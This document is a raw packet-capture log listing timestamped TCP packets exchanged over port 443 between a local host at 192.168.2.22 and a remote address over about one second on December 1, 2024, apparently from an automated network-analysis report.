                                                            Dec 1, 2024 14:28:01.663662910 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.687728882 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.687742949 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.687767982 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.687784910 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.687834978 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.702414989 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.702436924 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.702498913 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.702513933 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.721271992 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.721296072 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.721330881 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.721344948 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.721354008 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.732296944 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.732319117 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.732362032 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.732373953 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.732383013 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.739983082 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.740026951 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.740048885 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.740058899 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.740122080 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.751255989 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.751279116 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.751326084 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.751336098 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.759758949 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.759825945 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.759835958 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.857594967 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.857788086 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.857804060 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.876856089 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.876879930 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.876899958 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.876926899 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.876938105 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.876949072 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.883912086 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.883933067 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.883955956 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.883972883 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.883985043 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.884002924 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.884017944 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.884023905 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.890908957 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.890928984 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.890948057 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.890961885 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.890974998 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.890985012 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.891012907 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.891019106 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.899385929 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.899408102 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.899442911 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.899451017 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.899461985 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.906158924 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.906203985 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.906220913 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.906233072 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.906277895 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.914967060 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.914988041 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.915030956 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.915039062 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.921756029 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.921818018 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.921825886 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.928328037 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.928405046 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.928412914 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.937102079 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.937160015 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.937167883 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.943816900 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.943873882 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.943883896 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.951541901 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.951646090 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.951653957 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.958384991 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.958405972 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.958436966 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.958446026 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.967080116 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.967132092 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.967133045 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.967158079 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.967214108 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.967221022 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.973944902 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:01.974004984 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:01.974014044 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.049088955 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.049159050 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.049170017 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.054713964 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.054733038 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.054759026 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.054783106 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.054791927 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.054811001 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.068273067 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.068294048 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.068312883 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.068346977 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.068358898 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.068372965 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.074141026 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.074161053 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.074179888 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.074203014 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.074215889 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.074227095 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.079730988 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.079751968 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.079802990 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.079813004 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.079879045 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.084498882 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.084537029 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.084580898 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.084593058 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.084631920 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.089127064 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.089148045 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.089185953 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.095094919 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.095161915 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.095170021 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.099669933 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.099725962 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.099734068 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.105509043 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.105570078 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.105577946 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.109843016 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.109904051 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.109913111 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.115021944 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.115089893 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.115098000 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.119539022 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.119596004 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.119604111 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.124092102 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.124151945 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.124161005 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.129517078 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.129575014 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.129582882 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.237517118 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.237601042 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.237611055 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.242033005 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.242054939 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.242073059 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.242091894 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.242100000 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.242153883 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.242153883 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.242165089 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.258124113 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.258145094 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.258164883 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.258192062 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.258202076 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.258215904 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.261234045 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.261254072 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.261272907 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.261286974 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.261296988 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.261307955 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.261338949 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.261344910 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.264347076 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.264369011 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.264539957 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.264539957 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.264549017 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.268457890 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.268495083 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.268548965 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.268558025 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.268595934 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.271722078 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.271743059 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.271785975 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.271794081 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.274770975 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.274827957 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.274836063 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.278872013 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.278944016 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.278950930 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.282078981 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.282136917 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.282145023 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.285752058 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.285810947 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.285820007 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.289354086 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.289427996 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.289438009 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.292809010 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.292869091 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.292876959 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.296089888 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.296147108 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.296154976 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.299218893 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.299287081 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.299294949 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.303215027 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.303282976 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.303289890 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.430550098 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.430625916 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.430635929 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.433664083 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.433686018 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.433703899 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.433716059 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.433734894 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.433736086 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.433783054 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.433790922 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.450073004 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.450093031 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.450110912 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.450136900 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.450149059 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.450151920 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.453157902 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.453176975 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.453193903 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.453205109 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.453216076 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.453222036 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.453262091 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.453269005 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.456414938 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.456434965 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.456470966 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.456480026 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.456487894 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.460494041 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.460526943 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.460565090 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.460573912 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.460613966 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.463633060 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.463654995 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.463691950 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.466794014 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.466850042 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.466857910 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.470848083 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.470902920 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.470911026 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.473987103 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.474042892 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.474052906 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.477322102 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.477376938 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.477385044 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.481643915 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.481694937 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.481703043 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.484828949 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.484884024 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.484890938 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.488090992 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.488332987 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.488348961 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.491204023 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.491276979 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.491295099 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.495215893 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.495265961 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.495280981 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.651467085 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.651559114 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.651581049 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.655590057 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.655600071 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.655632019 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.655635118 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.655653000 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.655663967 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.655683994 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.658823013 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.658834934 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.658855915 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.658883095 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.658893108 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.662044048 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.662055016 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.662072897 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.662112951 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.662138939 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.665966034 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.665976048 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.666043997 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.666053057 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.669217110 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.669228077 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.669291019 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.669300079 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.673291922 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.673331976 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.673347950 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.673357964 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.673397064 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.676342010 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.676352978 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.676423073 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.676430941 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.679665089 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.679735899 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.679744005 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.683207989 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.683278084 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.683286905 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.686361074 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.686415911 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.686424017 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.690345049 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.690398932 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.690407991 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.693617105 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:02.693689108 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:02.693696976 CET44349162142.215.209.77192.168.2.22
